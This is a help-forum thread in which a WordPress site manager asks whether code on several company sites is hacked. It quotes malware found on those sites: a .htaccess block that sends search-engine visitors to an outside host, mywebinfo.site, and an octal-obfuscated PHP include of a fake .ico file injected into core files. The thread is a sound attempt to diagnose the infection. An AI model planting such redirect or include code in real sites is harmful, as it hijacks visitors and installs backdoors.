# Is this .htaccess file hacked? All of the sites I manage get random redirects

Tags: wordpress, .htaccess, http-redirect

Is this htaccess file hacked? I'm referring to this code that's in all of the site's htaccess files:

```
    # END WordPress
<If "%{HTTP_REFERER} =~ m#/(.*google.*)|(.*bing.*)/#">
ErrorDocument 404 http://mywebinfo.site/jquery.php?referrer404=%{escape:%{HTTP_REFERER}}
ErrorDocument 500 http://mywebinfo.site/jquery.php?referrer500=%{escape:%{HTTP_REFERER}}
</If>
```

I have installed Wordfence on all the sites that I manage for my company, and am constantly scanning and picking malicious stuff, but it never says anything about the .htaccess files...and they all have this code in them after #END Wordpress and before the code that Wordfence injects in there...

Here's a link to one of the sites, which today is redirecting...but it seems like the redirects are running in some kind of cascading effect, as in we have a bunch of sites under our hosting account, and one day site A redirecrts, and the next day site B redirects...anyways, today this site is redirecting:

[https://odotapparel.com/]

This site, along with every other site we have, has that code in it's htaccess file, and I'm wondering if that's part of the problem. FYI, I'm sort of self-taught out of necessity when it comes to this stuff, so be kind lol.

Comment: Do you have a file in the root folder with the name `jquery.php`? and if yes then what's inside it and did you create it?

Comment: I dont have that folder, but I do have a file with "jquery.php" as it's extension, and it's only for one of sites under the hosting plan. In fact, that site isn't even in use anymore, and the folder is dated way back to August 2020.  There's a whole load of php files, I believe it was for a plugin or something. Anyways, no I did not make it.

Comment: maybe that file and code in htaccess were being used in the past but not anymore. you can confirm with the old site manager and then remove those things and keep the backup.

Comment: Is `mywebinfo.site` intended to be your site's domain? Are _all_ URLs redirected? What are the redirect targets?

Comment: _Aside:_ By itself, the code you posted above wouldn't necessarily do anything on a WordPress site since all requests that don't map to a file or directory are routed through the WP front-controller (so no Apache 404 occurs). Unless, there is an additional `.htaccess` file in a subdirectory that disables/overrides the mod_rewrite directives in the parent config? Likewise, it shouldn't be possible to generate a 500 response unless there is something else in the file?

Comment: No mywebinfo.site isn't intended to be my site's domain. This whole thing has me confused, and as a company, we really can't afford to put money in to getting 7 - 10 sites cleaned out unfortunately (hence why I'm trying to figure out where this is all coming from on my own. Basically, we have around 7-10 apparel/spiritwear sites that I created and manage  (not currently sure of how many, we have gotten rid of or deactivated rid some sites). A few months ago I started noticing all of these crazy file names in each of the site's main folders on the sever.

Comment: First noticed there was some kind of malicious "wpyii2" plugin in each of the site's "wpcontent/plugins" folders. Getting rid of those plugins worked at first, but they started coming back. Somehow I must have ended up finding the culprit (with Wordfence scan's help) of that particular plugin being constantly re-uploaded (and changing the hosting account password probably helped, although we haven't changed the FTP password).  So the crazy named php files and the wpyii2 plugin don't come back anymore, the site's still get randomly redirected to pages like https://maincaptcha.top/...

Comment: ...And all of the different sites index.php, wp-admin, and wp-settings get stuff like:    
 <php> /*5b778*/        

@include "\057ho\155e/\146an\164as\164ic\06520\060/p\165bl\151c_\150tm\154/l\157ca\15433\067ap\160ar\145l.\143om\057wp\055in\143lu\144es\057bl\157ck\163/g\162ou\160/.\061b6\06272\141c.\151co";

/*5b778*/   injected into the code at the top .I've found and gotten rid of most of the fake .ico files that this type of code references, but something is still on the server that makes these files get this code constantly injected.